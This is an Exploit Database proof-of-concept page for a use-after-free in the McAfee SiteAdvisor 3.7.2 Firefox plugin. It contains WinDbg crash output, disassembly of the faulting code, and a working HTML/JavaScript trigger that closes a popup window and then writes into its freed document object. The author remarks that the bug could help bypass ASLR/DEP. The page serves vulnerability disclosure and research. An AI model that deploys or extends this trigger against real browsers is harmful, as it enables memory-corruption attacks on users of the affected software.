McAfee SiteAdvisor 3.7.2 – Firefox Use-After-Free (PoC)

• Exploit Database
• 13 阅读

• 作者： Marcin Ressel
  日期： 2015-07-01
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37456/

• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  <html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=windows-1250">
  <meta name="generator" content="PSPad editor, www.pspad.com">
  <title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
  </head>
  <body>
  <script>
  
  /*
  Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
  Author: Marcin Ressel
  Twitter: https://twitter.com/m_ressel
  NPMcFFPlg32.dll
  McAfee SiteAdvisor 3.7.2
  Tested on: Windows 8.1 (x64) and firefox 38.0.5
  Homepage: https://www.siteadvisor.com/
  
  Note: this vlun potentiali give us posibility to bruteforce base modules in memory 
  to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces 
  i mean firefox will not crash after trigger uaf i McAfee
  
  0:107> !gflag
  Current NtGlobalFlag contents: 0x02001800
  htg - Enable heap tagging
  ust - Create user mode stack trace database
  hpa - Place heap allocations at ends of pages
  
  0:107> g
  (1d68.1b54): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
  eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
  cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00210246
  NPMcFFPlg32!CreateFFScriptable+0x141:
  6f404391 8b4008mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
  
  ...
  6f40437a 8b02mov eax,dword ptr [edx]
  6f40437c 85c0testeax,eax
  6f40437e 7402jeNPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
  6f404380 8b00mov eax,dword ptr [eax]
  6f404382 8b4808mov ecx,dword ptr [eax+8]
  6f404385 8b4004mov eax,dword ptr [eax+4]
  6f404388 49dec ecx
  6f404389 234a08and ecx,dword ptr [edx+8]
  6f40438c 8b0488mov eax,dword ptr [eax+ecx*4]
  6f40438f 8b00mov eax,dword ptr [eax]
  6f404391 8b4008mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
  6f404394 eb45jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
  6f404396 8d45d0lea eax,[ebp-30h]
  6f404399 50pusheax
  6f40439a e8d10e0000callNPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
  6f40439f 8bd0mov edx,eax
  6f4043a1 8b02mov eax,dword ptr [edx]
  6f4043a3 85c0testeax,eax
  6f4043a5 7402jeNPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
  6f4043a7 8b00mov eax,dword ptr [eax]
  6f4043a9 8b4808mov ecx,dword ptr [eax+8]
  6f4043ac 8b4004mov eax,dword ptr [eax+4]
  6f4043af 49dec ecx
  6f4043b0 234a08and ecx,dword ptr [edx+8]
  6f4043b3 8b3488mov esi,dword ptr [eax+ecx*4]
  6f4043b6 8d45c4lea eax,[ebp-3Ch]
  6f4043b9 50pusheax
  6f4043ba e8b10e0000callNPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
  6f4043bf 8bd0mov edx,eax
  ...
  
  */
  
  var win = null;
  
  function crash()
  {
   var doc = win.document;
  
   var obj = doc;
   win.close();
  
   for(var p in obj)
   {
   if(typeof obj[p] == 'string')
   {
   try{ obj[p] = "CCCC"; }catch(err){}
   }
   }
  }
  
  win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
  win.onload = crash;
   
   
   
  </script>
  
  </body>
  </html>